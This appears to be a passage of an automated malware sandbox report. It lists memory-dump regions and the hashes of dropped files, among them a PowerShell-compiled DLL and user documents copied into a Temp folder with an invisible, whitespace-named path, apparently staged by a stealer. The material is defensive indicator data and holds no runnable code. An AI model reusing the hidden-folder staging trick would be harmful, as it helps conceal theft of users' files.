memory/2168-229-0x0000000007480000-0x000000000749A000-memory.dmp

memory/2168-218-0x0000000007AC0000-0x000000000813A000-memory.dmp

memory/2168-230-0x00000000074F0000-0x00000000074FA000-memory.dmp

memory/4424-232-0x0000000006C00000-0x0000000006C22000-memory.dmp

memory/4424-233-0x0000000007280000-0x0000000007824000-memory.dmp

memory/2168-231-0x0000000007700000-0x0000000007796000-memory.dmp

memory/4424-234-0x0000000006DC0000-0x0000000006E52000-memory.dmp

memory/2060-235-0x000000006FA90000-0x000000006FADC000-memory.dmp

memory/2168-245-0x0000000007680000-0x0000000007691000-memory.dmp

memory/1696-260-0x0000000075010000-0x000000007502B000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\w04kdbgn\w04kdbgn.cmdline

MD5 7391aa0137bbcae9d3d6d16f0feea77d
SHA1 fcfccfed7e111b4969a6b785b39745c49f4ec2b4
SHA256 ba7a904727b2714a4a653aacd2103834568f2c0a9e649e3cab70b155cc29d400
SHA512 4c9094aedf3351c87970259a051ae5ce94e3c2dd661698fe237d1888b52def47d96ce9c18a9b8dc4d490f07dbe2e7b4a14e44c554c0057fe10b9fc700c429f84

\??\c:\Users\Admin\AppData\Local\Temp\w04kdbgn\w04kdbgn.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dc48f4cc04af7ab5f10de12b93ba223c
SHA1 7715398069061008777603781be5b9e0ff40cb16
SHA256 5fe7574400cc845db67a52839d5f2d0deb703078f2d5b95e2b14e6bcd0877f15
SHA512 6f3b304521e56a8f602a77517737333bbcabb7c91a7d53caad7394a3f081c11a74eb0be760ff3bd18ddc0ae77ba7f23d99e647e242eec8e05fec78964dbfdb05

memory/1540-263-0x00000000074B0000-0x00000000074BE000-memory.dmp

memory/1540-267-0x00000000074C0000-0x00000000074D4000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\w04kdbgn\CSC377B9FBE79E241CD866FDE2206C341F.TMP

MD5 3590ed41892772a98164f3dfa81d2276
SHA1 80bbbbdd392ca312c3bb55ef04454690bcd96e02
SHA256 951d441ba71618d0fb4b9dff51a7f3d787ea6ee0c68381c7fe7d0b90a3c89ecc
SHA512 6db933c05466bd518e50ec3457252096d6120210e9b356ad6d6eea13800b8fff3abd7d7cf7abe4256066bd4600538c57715f46b8d2018f0f9a660f893bb1f974

memory/1540-270-0x00000000075C0000-0x00000000075DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RES62C1.tmp

MD5 82332ad1d32eddba38a609776ec8b53d
SHA1 6444613945f1264a0d6b86d4eeb8f2fad0e37677
SHA256 ec20eba15c84d9d624585c7ab208992311ae2d6f59a2b482ab006e4fc2db299f
SHA512 9016536ced43d27bd8722bade5b6e77155113fba4b70a50d0c2f676b3d579cee0e67095ce9df78335586a025bf73e626d2fc2cbc4fcf1275f9c3502802d5d3f4

memory/1540-273-0x00000000075A0000-0x00000000075A8000-memory.dmp

memory/3384-275-0x0000000007310000-0x0000000007318000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\w04kdbgn\w04kdbgn.dll

MD5 05b9d024df38960bc60f1ae8d3747d9f
SHA1 480bab4dfa1e5e2aec58dabfceb528686a773bad
SHA256 d50e8a0bf510e8277e670832034e3d7c0455f39e2115bfb0c183ac6c8cc5a376
SHA512 82cedb0dfb3c9efcf32d6afce24b412a1a9c1a930e0818f079c79459bd842a8e04909ef2d9f5b597bd91d3b4b259f5d5d3c13e4b37f78d7883de97c74007516b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 bdf103ecadf2098f1a4af55b65cd072a
SHA1 cd0c398d2c35946a65653d8f5be64681dff0ac96
SHA256 3026e82835ee98106040a6da7252950f518e6fb3449bfd2293d7f9abbb19918a
SHA512 ef8ec609de440269cb7597041b3df164a7d83141b038003f26b782de53c0a0de4b985576c862d7a637a6b3d8201267c45c22d726b1d76fd66793a211b81463c6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0aa1a1061298bb4850c32ade0afc6bbc
SHA1 0fd9cfde25edc7a96b6775d67bb47905a513f03c
SHA256 8e30f970b87646d6ed451d74913fa258ab3940842c15c9ab02d9b61e14ab5683
SHA512 b702647a7cf26c002b7a5b8e1336e83ff273bd2e52c37f964b8749a7c3d116b69d7071906cb19112930c12aa311ecdb41fa2331614941d6e3354b9c4ee36215b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 84abc8fd8dd4c36cac3cb483045fb885
SHA1 d9f0333c4e3b86901f3bfe1a42564d66e3b2f947
SHA256 4c8933506b5b5e1a018dd2fd529885131235d8f7562eb6aedf163afcb2210c6d
SHA512 df4d7eea6f50a79c3eff7ed706d0ecd54e998d611e23164f3158367b1892ae239b07f958c5a6f8c0aa4e8533aa014ed31add15e7ec5a3928e8a4dd40082c295b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d1520de42dbe9fa38e931690621b749
SHA1 cfd394b93fd126c016733da2baa995be8be1d198
SHA256 56cc4c56e3b0a205c15013262925e0ca83110ba8b20fc712cdfa26cfdc76ce96
SHA512 624a1577b38c08be5d241557039397be47b5f55f7c97b3106604b4273e999c19c7b0a77ef693b2755fdaa6f0f1307837d16852945b11effed1806601171388ca

memory/3152-300-0x0000000006070000-0x00000000063C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Desktop\BackupJoin.jpg

MD5 2f5724fd0bbe24fc0c2e121bc39dcc6b
SHA1 e200355dc75f0dcacb8e884da4e2c88f0eae2500
SHA256 70c8667090615f2f10572e96d7a1ed58a6fdbb32b9c53bd37b6bb30aa3adea05
SHA512 75ae8495f1cba62d0dcc6859d05ca10505bd1e3e7e19c13ef3eb3fa33c18298356330f48e17d7b4e475842f3eaeb4acbcaa6171c9e439f1b4e524f3036a0c428

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\ConvertAdd.txt

MD5 0b32a9128bb1eede09db1aafcf487822
SHA1 c6c48a65e203de2f2c653748be23d9edcc6c4a4b
SHA256 b37978b3edd85161eca3b635de16204cc56dbe6c986072988ab1d6c0a9805ba6
SHA512 9f970c17ab09e8d1b44375c2bc7ccc6724f4a9af4796ad528d0c006f787738e5edc11bcd05dd418b0091ed2f6cca0ae35f8cb75c98dc1de24c19f24775ebd062

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\DisableSubmit.xlsx

MD5 3cda009a3c189d022407bea284b22bd8
SHA1 6ee22965105e2111b827c79f9d0ddf3d7eaf8e2d
SHA256 30431d5cd7e497b4230fe58e62c0ed094d7a3b3e3257a7a080f37bfc7c648ee2
SHA512 865014ceed1bead8ed880498bd0c1871c5e1131b1858b13f83a2fc7f62fe5f256b5d3b107517500129fb2f432ddf9b907ae4f8bb67290dc779346a8bed438cc4

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\GetMerge.xlsx

MD5 ee11b1b1442f18b903b8b3aafb40e03d
SHA1 e6cc5196ca3fe3dda170475696262bba20c5e4fb
SHA256 6cd2ae3040b62697b1b0433bb38b455ea07f02df99673edcf3d4855dc0b76d98
SHA512 df4becbd8b8f4febbc556aa2c5be8a7b7dfef9f977bf6c35f06fbc609850397feb7d3080b03d4e0955a9d76102dd55de86c2d948e96c1e5822c4af3f900d0226

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\GroupConvertTo.docx

MD5 74ee5d6ac59109324c34280175b0cd59
SHA1 2ee2f551e55ef5c6c1ef72a169b0072399494808
SHA256 b0197f2c4c271c24698397d8e880157ed08c2e3da8a4cba827e495adc785776a
SHA512 821a651fecd4379de779a40405232cf5dc2d101aef959ad627d14b5bd771d46f139c2aa039935afed5339a36ee63d5e4b9bd31d770db6414a501550c6a3b86a1

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Documents\UnregisterReceive.doc

MD5 c97dcdbcee064719343ec5bbeca20a61
SHA1 c1692c918328597d943014ecaacb8a49d82e5818
SHA256 198a0fbcd8e01116fa7cb3999ececa4030e5ae814cbe639c6088a78ba7fd6d91
SHA512 737142a9d20fd125ca7990c6fda358b77069fffb68f0520953f0c3af585bd27d68f8e39915c963baf94c71d3c082faaf6d67c940b5c2da673171a73f7506208a

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Downloads\ApproveDeny.docx

MD5 b608aed38da2daccefb1607e41ed479b
SHA1 86324d79ce0c8f93f9dfa4f0582f633a03743c26
SHA256 f3b11d31e272f532c3f94318a541d368a5adbcfb15e1efb790e08392f4201f14
SHA512 fc2c0301df03cc7f5b86b3ede79a2179fd26d91f8c5e88c4e6b6ca535d56f1398d71f0887a356884ad5edc4677486caa289f055737af148f24bcf5768537fad8

C:\Users\Admin\AppData\Local\Temp\     ​ ‌  \Common Files\Downloads\ResumeBackup.asf

MD5 15d537e00a7fc763c96d2fcdf4b025d0
SHA1 0aa7d30337ef210c1212eeb9a9e93125edf0c7dd
SHA256 71a4d967f35ab613581c548b7fcb983aac05309c88e9af5209fb3f710d53286b
SHA512 c8333bd2a369527ce1eb3efc6594de556a37cb3eafc7e26d2a8234a1ea0cb16845be73bf70543b30e02f1766e67fce43785d3bec601779b48fa3a5518b2b9a4d

memory/1696-323-0x0000000075090000-0x00000000750AE000-memory.dmp

memory/1696-337-0x0000000074ED0000-0x0000000075007000-memory.dmp

memory/1696-336-0x0000000074850000-0x0000000074968000-memory.dmp

memory/1696-333-0x00000000749F0000-0x0000000074D7C000-memory.dmp

memory/1696-332-0x0000000074D80000-0x0000000074E29000-memory.dmp

memory/1696-331-0x0000000074E30000-0x0000000074E5C000-memory.dmp

memory/1696-329-0x0000000074EB0000-0x0000000074EC6000-memory.dmp

memory/1696-322-0x00000000750E0000-0x00000000755F0000-memory.dmp

memory/4588-346-0x0000000005C10000-0x0000000005F64000-memory.dmp

memory/4588-349-0x0000000006340000-0x000000000638C000-memory.dmp

memory/1412-360-0x0000000005DF0000-0x0000000006144000-memory.dmp

memory/1696-362-0x0000000003DC0000-0x000000000414C000-memory.dmp

memory/1696-363-0x00000000750E0000-0x00000000755F0000-memory.dmp

memory/1696-393-0x00000000750E0000-0x00000000755F0000-memory.dmp

memory/1696-418-0x00000000749F0000-0x0000000074D7C000-memory.dmp

memory/1696-417-0x0000000074E30000-0x0000000074E5C000-memory.dmp

memory/1696-416-0x0000000074E60000-0x0000000074E6C000-memory.dmp

memory/1696-415-0x0000000074EB0000-0x0000000074EC6000-memory.dmp

memory/1696-414-0x0000000074ED0000-0x0000000075007000-memory.dmp

memory/1696-413-0x0000000075010000-0x000000007502B000-memory.dmp

memory/1696-412-0x0000000075030000-0x0000000075048000-memory.dmp

memory/1696-411-0x0000000075050000-0x0000000075077000-memory.dmp

memory/1696-410-0x0000000074D80000-0x0000000074E29000-memory.dmp

memory/1696-409-0x0000000075090000-0x00000000750AE000-memory.dmp

memory/1696-408-0x0000000075080000-0x000000007508D000-memory.dmp

memory/1696-407-0x0000000074850000-0x0000000074968000-memory.dmp

memory/1696-406-0x0000000074970000-0x000000007497C000-memory.dmp

memory/1696-405-0x0000000074980000-0x0000000074990000-memory.dmp